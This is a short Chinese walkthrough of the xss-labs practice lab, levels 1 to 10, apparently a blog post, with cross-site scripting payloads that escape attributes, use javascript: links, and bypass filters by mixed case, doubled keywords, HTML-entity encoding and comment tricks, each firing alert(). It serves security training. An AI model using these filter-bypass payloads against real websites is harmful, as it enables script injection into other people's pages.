xss-labs解答

下载xss-labs到www目录下

在xp上创建网站

需要访问时打开apchi和mysql

level-1

网络源代码

网页源码里是有个alert函数,触发就能通关

用< svg οnclick="alert(1)" >

level2

先随便数个1

用payload逃出这个引号内容,然后调用alert函数

" οnclick="alert(1)

点击框完成

level3

也随便输一个

变成了''答案改为''就行

level4

试试" οnclick="alert(1)

竟然行了

level5

继续用" οnclick="alert(1)发现onclick被破坏

换个方法"><a href="javascript:alert(1)">test</a>

创建一个超链接

点击test完成

level6

继续使用上一关方法

href被破坏,那就试试大小写

可以了😀

level7

这次更狠,给href和script给删掉了,大小写也没用

可以试试双拼"><a hrhrefef=javasscriptcript:alert()>test</a>

可以看到他只屏蔽了一个href和script

level8

加个链接发现又被破坏了

它在我们script的中间加了个_ ,那我们就把r和i换成编码

复制代码
javasc&#114;&#105;&#10;pt:alert()

level9

说我们链接不合法,就是链接不规范,加上http://

又被破坏,换成编码,因为要有http://,只有它失效才能执行JavaScript:alert()的弹窗效果,但是不能删了他,要利用它过掉过滤,用/* */把他注释掉

复制代码
javasc&#114;&#105;&#10;pt:alert()  /* http:// */

level10

发现没有框

都试一下

发现只有sort有用

复制代码
直接用t_sort=" onfocus="alert()" autofocus="" type="text自动聚焦套框
相关推荐
学习3人组15 小时前
思科Packet Tracer 7.4 生成树协议(STP)配置与安全防护上机讲义
网络·安全·php
vx-程序开发16 小时前
基于机器学习的动漫可视化系统的设计与实现-计算机毕业设计源码08339
java·c++·spring boot·python·spring·django·php
imuliuliang16 小时前
Laravel6.x核心特性全解析
android·php·laravel
idingzhi17 小时前
A股量化策略日报(2026年05月22日)
android·开发语言·python·kotlin
测试员周周18 小时前
【Appium 系列】第14节-断言与验证 — Validator 的设计
android·人工智能·python·功能测试·ios·单元测试·appium
kft131418 小时前
XSS深度剖析:从弹窗到持久化窃取Cookie
前端·web安全·xss·安全测试
赏金术士19 小时前
Android 动画对比指南:View 系统 vs Jetpack Compose
android·kotlin·compose
德迅云安全-小潘19 小时前
了解并防范跨站脚本攻击,XSS攻击全解析,德迅云安全SCDN提供全方位的安全
网络·安全·xss
我命由我1234519 小时前
C++ - 面向对象 - 析构函数
android·c语言·开发语言·c++·visualstudio·visual studio·android runtime
失眠的咕噜20 小时前
PDA 安卓设备上传多张图片
android·前端·javascript